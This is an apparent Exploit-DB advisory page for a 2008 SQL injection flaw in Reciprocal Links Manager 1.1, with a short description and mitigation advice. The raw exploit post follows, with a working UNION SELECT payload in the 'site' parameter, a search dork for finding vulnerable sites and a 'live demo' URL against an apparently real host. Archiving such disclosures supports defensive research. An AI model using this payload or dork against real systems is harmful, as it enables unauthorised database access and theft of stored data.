Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability

vendor:

Reciprocal Links Manager

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Reciprocal Links Manager

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:sourceworkshop:reciprocal_links_manager:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames, passwords, and other sensitive data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.sourceworkshop.com/reciprocal_links_manager.html
|
| DorK   : "Powered by Reciprocal Links Manager"
|___________________________________________________|

Exploit:
________



www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--



L!VE DEMO:
_________


http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--





____________________________( Greetz )_________________________________
|
|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
| 
|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
 

                       Im IRAQi

# milw0rm.com [2008-09-02]